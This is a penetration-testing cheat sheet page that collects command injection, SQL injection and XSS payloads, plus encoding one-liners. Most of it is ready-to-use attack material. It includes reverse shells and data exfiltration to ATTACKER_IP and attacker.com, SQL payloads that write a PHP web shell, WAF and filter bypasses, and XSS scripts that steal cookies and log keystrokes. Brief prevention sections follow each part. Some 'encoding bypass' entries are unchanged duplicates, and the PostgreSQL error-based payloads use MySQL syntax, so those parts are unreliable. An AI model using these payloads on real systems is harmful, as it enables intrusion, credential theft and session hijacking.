Payload

Command Injection Payloads

Command Injection Payloads Comprehensive collection of command injection payloads and bypass techniques for penetration testing. Basic Command Injection Simple Commands # Basic command execution ; ls | ls & ls && ls || ls # Command chaining ; ls; whoami | ls | cat & ls & whoami && ls && whoami || ls || whoami Information Gathering # System information ; uname -a ; whoami ; id ; pwd ; ls -la ; cat /etc/passwd ; cat /etc/hosts ; cat /proc/version ; cat /proc/cpuinfo ; cat /proc/meminfo Network Information # Network interfaces ; ifconfig ; ip addr ; ip route ; netstat -an ; ss -tuln ; arp -a ; route -n Process Information # Running processes ; ps aux ; ps -ef ; top ; htop ; pstree ; lsof ; fuser Advanced Command Injection File Operations # File reading ; cat /etc/passwd ; head /etc/passwd ; tail /etc/passwd ; more /etc/passwd ; less /etc/passwd ; grep root /etc/passwd ; awk '{print $1}' /etc/passwd ; sed -n '1,10p' /etc/passwd Directory Traversal # Directory listing ; ls -la / ; ls -la /home ; ls -la /var ; ls -la /tmp ; find / -name "*.txt" 2>/dev/null ; find / -name "*.log" 2>/dev/null ; find / -name "*.conf" 2>/dev/null User Enumeration # User information ; cat /etc/passwd ; cut -d: -f1 /etc/passwd ; awk -F: '{print $1}' /etc/passwd ; getent passwd ; id ; whoami ; groups ; last ; w ; who Privilege Escalation # SUID files ; find / -perm -4000 2>/dev/null ; find / -perm -u+s 2>/dev/null ; find / -perm -2000 2>/dev/null ; find / -perm -g+s 2>/dev/null # Sudo capabilities ; sudo -l ; sudo -V ; cat /etc/sudoers ; grep -v '^#' /etc/sudoers Bypass Techniques Character Filtering Bypass # Space bypass ; cat${IFS}/etc/passwd ; cat$IFS/etc/passwd ; cat<tab>/etc/passwd ; cat<newline>/etc/passwd ; cat<carriage_return>/etc/passwd ; cat<form_feed>/etc/passwd ; cat<vertical_tab>/etc/passwd # Quote bypass ; cat /etc/passwd ; cat "/etc/passwd" ; cat '/etc/passwd' ; cat `/etc/passwd` Command Filtering Bypass # Case variation ; Ls ; LS ; lS ; Ls -La ; Ls -LA # Encoding bypass ; echo "cat /etc/passwd" | base64 | base64 -d | sh ; echo "cat /etc/passwd" | base64 | base64 -d | bash ; echo "cat /etc/passwd" | base64 | base64 -d | /bin/sh WAF Bypass # Comment bypass ; cat /etc/passwd # ; cat /etc/passwd /* ; cat /etc/passwd */ ; cat /etc/passwd <!-- # Encoding bypass ; cat /etc/passwd ; cat /etc/passwd ; cat /etc/passwd ; cat /etc/passwd Platform-specific Payloads Windows # Basic commands ; dir ; type C:\Windows\System32\drivers\etc\hosts ; whoami ; systeminfo ; ipconfig ; netstat -an ; tasklist ; wmic process list ; wmic service list ; reg query HKLM\SOFTWARE Linux/Unix # Basic commands ; ls ; cat /etc/passwd ; whoami ; uname -a ; ps aux ; netstat -an ; ss -tuln ; ifconfig ; ip addr ; route -n macOS # Basic commands ; ls ; cat /etc/passwd ; whoami ; uname -a ; ps aux ; netstat -an ; lsof -i ; ifconfig ; route -n ; system_profiler Advanced Techniques Reverse Shell # Netcat reverse shell ; nc -e /bin/sh ATTACKER_IP PORT ; nc -e /bin/bash ATTACKER_IP PORT ; nc -e /bin/sh ATTACKER_IP PORT ; nc -e /bin/bash ATTACKER_IP PORT # Bash reverse shell ; bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1 ; bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1 ; bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1 # Python reverse shell ; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' File Upload # Download file ; wget http://attacker.com/shell.php ; curl -O http://attacker.com/shell.php ; nc -l -p 1234 > shell.php ; python -c "import urllib; urllib.urlretrieve('http://attacker.com/shell.php', 'shell.php')" Data Exfiltration # Send data to attacker ; cat /etc/passwd | nc ATTACKER_IP PORT ; cat /etc/passwd | curl -X POST -d @- http://attacker.com/collect ; cat /etc/passwd | base64 | nc ATTACKER_IP PORT ; tar -czf - /etc/passwd | nc ATTACKER_IP PORT Testing Tools Commix # Basic scan python3 commix.py -u "http://target.com/page.php?cmd=test" # With POST data python3 commix.py -u "http://target.com/page.php" --data="cmd=test" # With cookies python3 commix.py -u "http://target.com/page.php?cmd=test" --cookie="PHPSESSID=abc123" # OS shell python3 commix.py -u "http://target.com/page.php?cmd=test" --os-shell Custom Script import requests import re def test_command_injection(url, param, payload): data = {param: payload} response = requests.post(url, data=data) # Check for command injection indicators indicators = [ "root:", "bin/bash", "bin/sh", "uid=", "gid=", "groups=", "total", "drwx", "-rw-", "Directory of", "Volume in drive" ] for indicator in indicators: if indicator in response.text: print(f"Command injection detected: {payload}") break # Test payloads payloads = [ "; ls", "| ls", "& ls", "&& ls", "|| ls", "; whoami", "| whoami", "& whoami", "&& whoami", "|| whoami" ] for payload in payloads: test_command_injection("http://target.com/command.php", "cmd", payload) Prevention and Mitigation Input Validation import re import shlex def validate_command(input_str): # Whitelist allowed characters allowed_chars = set('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_.') if not set(input_str).issubset(allowed_chars): return False # Check for dangerous characters dangerous_chars = [';', '|', '&', '&&', '||', '`', '$', '(', ')', '<', '>', '\\', '"', "'"] for char in dangerous_chars: if char in input_str: return False return True Command Execution import subprocess import shlex def safe_command_execution(command): # Validate input if not validate_command(command): raise ValueError("Invalid command") # Use shlex to safely parse command args = shlex.split(command) # Execute command safely result = subprocess.run(args, capture_output=True, text=True, timeout=30) return result.stdout, result.stderr Sandboxing import subprocess import os import tempfile def sandboxed_execution(command): # Create temporary directory with tempfile.TemporaryDirectory() as temp_dir: # Change to temporary directory os.chdir(temp_dir) # Execute command in sandbox result = subprocess.run( command, shell=True, capture_output=True, text=True, timeout=30, cwd=temp_dir ) return result.stdout, result.stderr Testing Checklist Test all input fields Test with different HTTP methods Test with different content types Test with different command separators Test with different quote types Test with different encoding methods Test with different bypass techniques Test with different WAF bypasses Test with different platform-specific commands Test with different privilege escalation techniques

Encoding/Decoding Tools

Encoding/Decoding Tools Various encoding and decoding utilities commonly used in penetration testing and security assessments. Base64 Encoding/Decoding Encode to Base64 # String to Base64 echo -n "TARGET_STRING" | base64 # File to Base64 base64 -i input.txt # Base64 with line wrapping echo -n "TARGET_STRING" | base64 -w 0 Decode from Base64 # Base64 to String echo "BASE64_STRING" | base64 -d # Base64 file to output base64 -d -i encoded.txt -o decoded.txt # Base64 to stdout echo "BASE64_STRING" | base64 -d URL Encoding/Decoding URL Encode # Using Python python3 -c "import urllib.parse; print(urllib.parse.quote('TARGET_STRING'))" # Using Node.js node -e "console.log(encodeURIComponent('TARGET_STRING'))" # Using xxd (hex encoding) echo -n "TARGET_STRING" | xxd -p | sed 's/../%&/g' URL Decode # Using Python python3 -c "import urllib.parse; print(urllib.parse.unquote('ENCODED_STRING'))" # Using Node.js node -e "console.log(decodeURIComponent('ENCODED_STRING'))" Hex Encoding/Decoding String to Hex # Using xxd echo -n "TARGET_STRING" | xxd -p # Using od echo -n "TARGET_STRING" | od -A n -t x1 # Using hexdump echo -n "TARGET_STRING" | hexdump -C Hex to String # Using xxd echo "HEX_STRING" | xxd -r -p # Using printf printf "\\x48\\x65\\x6c\\x6c\\x6f" ROT13 Encoding ROT13 Encode/Decode # Using tr echo "TARGET_STRING" | tr 'A-Za-z' 'N-ZA-Mn-za-m' # Using Python python3 -c "import codecs; print(codecs.encode('TARGET_STRING', 'rot13'))" Caesar Cipher Caesar Cipher (Shift 13) # Using tr with custom shift echo "TARGET_STRING" | tr 'A-Za-z' 'N-ZA-Mn-za-m' # Python implementation python3 -c " def caesar_cipher(text, shift): result = '' for char in text: if char.isalpha(): ascii_offset = 65 if char.isupper() else 97 result += chr((ord(char) - ascii_offset + shift) % 26 + ascii_offset) else: result += char return result print(caesar_cipher('TARGET_STRING', 13)) " Binary Encoding String to Binary # Using xxd echo -n "TARGET_STRING" | xxd -b # Using Python python3 -c " text = 'TARGET_STRING' binary = ' '.join(format(ord(char), '08b') for char in text) print(binary) " Binary to String # Using Python python3 -c " binary = '01001000 01100101 01101100 01101100 01101111' text = ''.join(chr(int(b, 2)) for b in binary.split()) print(text) " HTML Entity Encoding HTML Encode # Using Python python3 -c " import html print(html.escape('TARGET_STRING')) " HTML Decode # Using Python python3 -c " import html print(html.unescape('<script>alert(1)</script>')) " Unicode Encoding String to Unicode # Using Python python3 -c " text = 'TARGET_STRING' unicode_str = ''.join(f'\\u{ord(char):04x}' for char in text) print(unicode_str) " Unicode to String # Using Python python3 -c " unicode_str = '\\u0048\\u0065\\u006c\\u006c\\u006f' print(unicode_str.encode().decode('unicode_escape')) " Advanced Encoding Techniques Double URL Encoding # First encoding python3 -c "import urllib.parse; print(urllib.parse.quote('TARGET_STRING'))" | python3 -c "import urllib.parse; print(urllib.parse.quote(input()))" Base64 + URL Encoding # Base64 then URL encode echo -n "TARGET_STRING" | base64 | python3 -c "import urllib.parse; print(urllib.parse.quote(input()))" Hex + URL Encoding # Hex then URL encode echo -n "TARGET_STRING" | xxd -p | python3 -c "import urllib.parse; print(urllib.parse.quote(input()))" One-liner Commands Quick Base64 Encode echo -n "TARGET_STRING" | base64 | tr -d '\n' Quick URL Encode python3 -c "import urllib.parse; print(urllib.parse.quote('TARGET_STRING'))" Quick Hex Encode echo -n "TARGET_STRING" | xxd -p | tr -d '\n' Quick ROT13 echo "TARGET_STRING" | tr 'A-Za-z' 'N-ZA-Mn-za-m' File Operations Encode File to Base64 base64 -i input.txt -o encoded.txt Decode Base64 File base64 -d -i encoded.txt -o decoded.txt Encode Multiple Files for file in *.txt; do base64 -i "$file" -o "${file%.txt}.b64" done Online Alternatives If command-line tools are not available, these online services can be used: ...

SQL Injection Payloads

SQL Injection Payloads Comprehensive collection of SQL injection payloads and bypass techniques for penetration testing. Basic SQL Injection Union-based Injection -- Basic UNION ' UNION SELECT 1,2,3-- ' UNION SELECT NULL,NULL,NULL-- ' UNION SELECT 1,2,3,4,5-- -- With column names ' UNION SELECT username,password,email FROM users-- ' UNION SELECT table_name,column_name FROM information_schema.columns-- -- Multiple columns ' UNION SELECT 1,2,3,4,5,6,7,8,9,10-- Boolean-based Blind Injection -- Basic boolean tests ' OR 1=1-- ' OR '1'='1 ' OR 1=1# ' OR 1=1/* -- Conditional statements ' AND 1=1-- ' AND 1=2-- ' AND (SELECT COUNT(*) FROM users) > 0-- ' AND (SELECT LENGTH(username) FROM users LIMIT 1) > 5-- Time-based Blind Injection -- MySQL ' AND SLEEP(5)-- ' AND (SELECT SLEEP(5))-- ' AND IF(1=1,SLEEP(5),0)-- -- PostgreSQL '; SELECT pg_sleep(5)-- ' AND (SELECT pg_sleep(5))-- -- MSSQL '; WAITFOR DELAY '00:00:05'-- ' AND (SELECT COUNT(*) FROM sys.tables) > 0; WAITFOR DELAY '00:00:05'-- -- Oracle ' AND (SELECT COUNT(*) FROM all_tables) > 0 AND DBMS_LOCK.SLEEP(5)-- Database-specific Payloads MySQL -- Version detection ' UNION SELECT @@version-- ' UNION SELECT VERSION()-- -- Database enumeration ' UNION SELECT SCHEMA_NAME FROM information_schema.schemata-- ' UNION SELECT TABLE_NAME FROM information_schema.tables WHERE TABLE_SCHEMA=DATABASE()-- -- User enumeration ' UNION SELECT USER()-- ' UNION SELECT CURRENT_USER()-- ' UNION SELECT user,host FROM mysql.user-- -- File operations ' UNION SELECT LOAD_FILE('/etc/passwd')-- ' UNION SELECT '<?php system($_GET[cmd]); ?>' INTO OUTFILE '/var/www/shell.php'-- PostgreSQL -- Version detection ' UNION SELECT version()-- -- Database enumeration ' UNION SELECT datname FROM pg_database-- ' UNION SELECT tablename FROM pg_tables-- -- User enumeration ' UNION SELECT current_user-- ' UNION SELECT usename FROM pg_user-- -- File operations ' UNION SELECT pg_read_file('/etc/passwd')-- ' UNION SELECT '<?php system($_GET[cmd]); ?>' INTO OUTFILE '/var/www/shell.php'-- MSSQL -- Version detection ' UNION SELECT @@version-- ' UNION SELECT SERVERPROPERTY('productversion')-- -- Database enumeration ' UNION SELECT name FROM sys.databases-- ' UNION SELECT table_name FROM information_schema.tables-- -- User enumeration ' UNION SELECT SYSTEM_USER-- ' UNION SELECT USER_NAME()-- ' UNION SELECT name FROM sys.server_principals-- -- File operations ' UNION SELECT * FROM OPENROWSET('BULK','C:\\Windows\\System32\\drivers\\etc\\hosts','SINGLE_CLOB') AS x-- Oracle -- Version detection ' UNION SELECT banner FROM v$version-- ' UNION SELECT version FROM v$instance-- -- Database enumeration ' UNION SELECT table_name FROM all_tables-- ' UNION SELECT column_name FROM all_tab_columns WHERE table_name='USERS'-- -- User enumeration ' UNION SELECT user FROM dual-- ' UNION SELECT username FROM all_users-- -- File operations ' UNION SELECT UTL_FILE.FREAD('DIRECTORY','filename') FROM dual-- Advanced Bypass Techniques WAF Bypass -- Comment variations '/**/UNION/**/SELECT/**/1,2,3-- '/*!UNION*//*!SELECT*/1,2,3-- '%0AUNION%0ASELECT%0A1,2,3-- -- Case variation ' UnIoN SeLeCt 1,2,3-- ' uNiOn sElEcT 1,2,3-- -- Encoding bypass ' %55%4e%49%4f%4e %53%45%4c%45%43%54 1,2,3-- ' %55nion %53elect 1,2,3-- -- Double encoding ' %2555%254e%2549%254f%254e %2553%2545%254c%2545%2543%2554 1,2,3-- Filter Bypass -- Space replacement '/**/UNION/**/SELECT/**/1,2,3-- '%09UNION%09SELECT%091,2,3-- '%0AUNION%0ASELECT%0A1,2,3-- '%0DUNION%0DSELECT%0D1,2,3-- '%0CUNION%0CSELECT%0C1,2,3-- '%0BUNION%0BSELECT%0B1,2,3-- -- Keyword replacement ' UNI/**/ON SEL/**/ECT 1,2,3-- ' UNI%00ON SEL%00ECT 1,2,3-- ' UNI%0aON SEL%0aECT 1,2,3-- Quote Bypass -- Without quotes ' OR 1=1-- ' OR 1=1# ' OR 1=1/* -- With different quote types ' OR "1"="1-- ' OR '1'='1-- ' OR `1`=`1-- -- Hex encoding ' OR 0x31=0x31-- ' OR CHAR(49)=CHAR(49)-- Error-based Injection MySQL Error-based -- Extract database name ' AND extractvalue(1,concat(0x7e,(SELECT database()),0x7e))-- ' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)-- -- Extract table names ' AND extractvalue(1,concat(0x7e,(SELECT table_name FROM information_schema.tables LIMIT 1),0x7e))-- -- Extract column names ' AND extractvalue(1,concat(0x7e,(SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1),0x7e))-- PostgreSQL Error-based -- Extract database name ' AND (SELECT * FROM (SELECT COUNT(*),CONCAT((SELECT database()),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)-- -- Extract table names ' AND (SELECT * FROM (SELECT COUNT(*),CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)-- Second-order SQL Injection User Registration -- Username field admin'-- admin'/* admin'# -- Email field admin@test.com'-- admin@test.com'/* admin@test.com'# Profile Update -- Name field ' OR 1=1-- ' OR '1'='1 ' OR 1=1# -- Bio field ' UNION SELECT username,password FROM users-- ' UNION SELECT 1,2,3-- NoSQL Injection MongoDB // Basic injection {"$ne": null} {"$gt": ""} {"$regex": ".*"} // Authentication bypass {"username": {"$ne": null}, "password": {"$ne": null}} {"username": {"$gt": ""}, "password": {"$gt": ""}} // Data extraction {"$where": "this.username.match(/.*/)"} {"$where": "this.password.match(/.*/)"} CouchDB // Basic injection {"$ne": null} {"$gt": ""} // Authentication bypass {"username": {"$ne": null}, "password": {"$ne": null}} Automated Tools SQLMap Commands # Basic scan sqlmap -u "http://target.com/page.php?id=1" # With POST data sqlmap -u "http://target.com/login.php" --data="username=admin&password=admin" # With cookies sqlmap -u "http://target.com/page.php?id=1" --cookie="PHPSESSID=abc123" # Database enumeration sqlmap -u "http://target.com/page.php?id=1" --dbs sqlmap -u "http://target.com/page.php?id=1" --tables sqlmap -u "http://target.com/page.php?id=1" --columns -T users sqlmap -u "http://target.com/page.php?id=1" --dump -T users # OS shell sqlmap -u "http://target.com/page.php?id=1" --os-shell Custom Scripts # Python SQL injection tester import requests import time def test_sql_injection(url, param, payload): data = {param: payload} start_time = time.time() response = requests.post(url, data=data) end_time = time.time() if end_time - start_time > 4: print(f"Time-based injection detected: {payload}") elif "error" in response.text.lower(): print(f"Error-based injection detected: {payload}") elif "success" in response.text.lower(): print(f"Boolean-based injection detected: {payload}") # Test payloads payloads = [ "' OR 1=1--", "' UNION SELECT 1,2,3--", "' AND SLEEP(5)--", "' OR '1'='1" ] for payload in payloads: test_sql_injection("http://target.com/login.php", "username", payload) Prevention and Mitigation Parameterized Queries # Python example cursor.execute("SELECT * FROM users WHERE username = %s AND password = %s", (username, password)) # PHP example $stmt = $pdo->prepare("SELECT * FROM users WHERE username = ? AND password = ?"); $stmt->execute([$username, $password]); Input Validation # Whitelist validation allowed_chars = set('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') if not set(username).issubset(allowed_chars): return "Invalid username" # Length validation if len(username) > 50: return "Username too long" Testing Checklist Test all input fields Test with different HTTP methods (GET, POST, PUT, DELETE) Test with different content types (application/x-www-form-urlencoded, application/json) Test with different encodings (URL, Base64, Hex) Test with different quote types (single, double, backtick) Test with different comment styles (–, #, /* */) Test with different space replacements Test with different case variations Test with different encoding bypasses Test with different WAF bypass techniques

XSS Payloads

XSS Payloads Comprehensive collection of Cross-Site Scripting (XSS) payloads and bypass techniques. Basic XSS Payloads Simple Alert <script>alert('XSS')</script> <script>alert(1)</script> <script>alert(document.domain)</script> <script>alert(document.cookie)</script> Image Tag <img src=x onerror=alert('XSS')> <img src="javascript:alert('XSS')"> <img src=x onerror=alert(1)> <img src=x onerror=alert(document.cookie)> Input Tag <input onfocus=alert('XSS') autofocus> <input onmouseover=alert('XSS')> <input onfocus=alert(1) autofocus> <input onblur=alert(1) autofocus><input autofocus> Event Handlers Mouse Events <div onmouseover=alert('XSS')>Hover me</div> <div onmouseenter=alert('XSS')>Enter me</div> <div onmouseleave=alert('XSS')>Leave me</div> <div onmousedown=alert('XSS')>Click me</div> <div onmouseup=alert('XSS')>Release me</div> <div onclick=alert('XSS')>Click me</div> <div ondblclick=alert('XSS')>Double click me</div> Keyboard Events <input onkeydown=alert('XSS')> <input onkeyup=alert('XSS')> <input onkeypress=alert('XSS')> <input onkeydown=alert(1)> <input onkeyup=alert(1)> <input onkeypress=alert(1)> Form Events <form onsubmit=alert('XSS')> <input onchange=alert('XSS')> <input oninput=alert('XSS')> <input oninvalid=alert('XSS')> <input onreset=alert('XSS')> <input onsearch=alert('XSS')> Window Events <body onload=alert('XSS')> <body onunload=alert('XSS')> <body onbeforeunload=alert('XSS')> <body onresize=alert('XSS')> <body onscroll=alert('XSS')> <body onfocus=alert('XSS')> <body onblur=alert('XSS')> Filter Bypass Techniques Case Variation <SCRIPT>alert('XSS')</SCRIPT> <ScRiPt>alert('XSS')</ScRiPt> <script>alert('XSS')</script> <SCRIPT>alert('XSS')</SCRIPT> Encoding Bypass  %3Cscript%3Ealert('XSS')%3C/script%3E %3Cimg%20src=x%20onerror=alert('XSS')%3E  <script>alert('XSS')</script> <img src=x onerror=alert('XSS')>  <script>alert('XSS')</script> <img src=x onerror=alert('XSS')>  \u003cscript\u003ealert('XSS')\u003c/script\u003e Quote Bypass  <img src=x onerror=alert('XSS')> <img src=x onerror=alert("XSS")> <img src=x onerror=alert(`XSS`)> <img src=x onerror=alert(XSS)>  <img src=x onerror=alert('XSS')> <img src=x onerror=alert("XSS")> <img src=x onerror=alert(`XSS`)> Space Bypass  <img src=x onerror=alert('XSS')>  <img src=x onerror=alert('XSS')>  <img src=x onerror=alert('XSS')>  <img src=x onerror=alert('XSS')> Comment Bypass  <img src=x onerror=alert('XSS')>  <script>/*comment*/alert('XSS')</script> <script>//comment alert('XSS')</script> Advanced Bypass Techniques WAF Bypass  <svg onload=alert('XSS')> <iframe onload=alert('XSS')> <object onload=alert('XSS')> <embed onload=alert('XSS')>  <img src=x onerror=alert('XSS')> <img src=x onerror=alert('XSS')> <img src=x onerror=alert('XSS')> CSP Bypass  <script nonce="random">alert('XSS')</script>  <script>alert('XSS')</script>  <script src="data:text/javascript,alert('XSS')"></script> <script src="javascript:alert('XSS')"></script> DOM-based XSS // URL Fragment #<script>alert('XSS')</script> #<img src=x onerror=alert('XSS')> // Hash change window.location.hash = "<script>alert('XSS')</script>"; // Document write document.write('<script>alert("XSS")</script>'); // InnerHTML element.innerHTML = '<script>alert("XSS")</script>'; // Eval eval('alert("XSS")'); Stored XSS Payloads Profile Fields  <script>alert('XSS')</script> <img src=x onerror=alert('XSS')>  <script>alert('XSS')</script> <img src=x onerror=alert('XSS')>  <script>alert('XSS')</script> <img src=x onerror=alert('XSS')> File Upload  <img src=x onerror=alert('XSS')>  <svg onload=alert('XSS')>  <script>alert('XSS')</script> Reflected XSS Payloads URL Parameters  ?search=<script>alert('XSS')</script> ?search=<img src=x onerror=alert('XSS')>  username=<script>alert('XSS')</script> password=<img src=x onerror=alert('XSS')> Headers  User-Agent: <script>alert('XSS')</script>  Referer: <script>alert('XSS')</script>  X-Forwarded-For: <script>alert('XSS')</script> Blind XSS Payloads Data Exfiltration  <script> var xhr = new XMLHttpRequest(); xhr.open('GET', 'http://attacker.com/steal?data=' + document.cookie); xhr.send(); </script>  <img src="http://attacker.com/steal?data=document.cookie">  <form action="http://attacker.com/steal" method="post"> <input type="hidden" name="data" value="document.cookie"> </form> Keylogger <script> document.addEventListener('keypress', function(e) { var xhr = new XMLHttpRequest(); xhr.open('GET', 'http://attacker.com/keylog?key=' + e.key); xhr.send(); }); </script> Session Hijacking <script> var xhr = new XMLHttpRequest(); xhr.open('GET', 'http://attacker.com/session?cookie=' + document.cookie); xhr.send(); </script> Mobile XSS Payloads Touch Events <div ontouchstart=alert('XSS')>Touch me</div> <div ontouchend=alert('XSS')>Touch me</div> <div ontouchmove=alert('XSS')>Touch me</div> <div ontouchcancel=alert('XSS')>Touch me</div> Orientation Events <div onorientationchange=alert('XSS')>Rotate me</div> <div onresize=alert('XSS')>Resize me</div> Testing Tools XSSer # Basic scan xsser --url="http://target.com/page.php?search=test" # With payloads xsser --url="http://target.com/page.php?search=test" --payload="<script>alert('XSS')</script>" # With encoding xsser --url="http://target.com/page.php?search=test" --encode XSStrike # Basic scan python3 xsstrike.py -u "http://target.com/page.php?search=test" # With crawling python3 xsstrike.py -u "http://target.com/page.php?search=test" --crawl # With blind XSS python3 xsstrike.py -u "http://target.com/page.php?search=test" --blind Custom Script import requests import re def test_xss(url, param, payload): data = {param: payload} response = requests.post(url, data=data) if payload in response.text: print(f"XSS detected: {payload}") elif "alert" in response.text.lower(): print(f"XSS detected: {payload}") # Test payloads payloads = [ "<script>alert('XSS')</script>", "<img src=x onerror=alert('XSS')>", "<svg onload=alert('XSS')>", "<iframe onload=alert('XSS')>" ] for payload in payloads: test_xss("http://target.com/search.php", "query", payload) Prevention and Mitigation Input Validation # Whitelist validation import re def validate_input(input_str): # Allow only alphanumeric and basic punctuation pattern = r'^[a-zA-Z0-9\s.,!?]+$' return re.match(pattern, input_str) is not None Output Encoding import html def encode_output(input_str): return html.escape(input_str) Content Security Policy  <meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'self' 'unsafe-inline';">  <meta http-equiv="Content-Security-Policy" content="script-src 'self' 'nonce-random'"> Testing Checklist Test all input fields Test with different HTTP methods Test with different content types Test with different encodings Test with different quote types Test with different event handlers Test with different tag types Test with different bypass techniques Test with different WAF bypasses Test with different CSP bypasses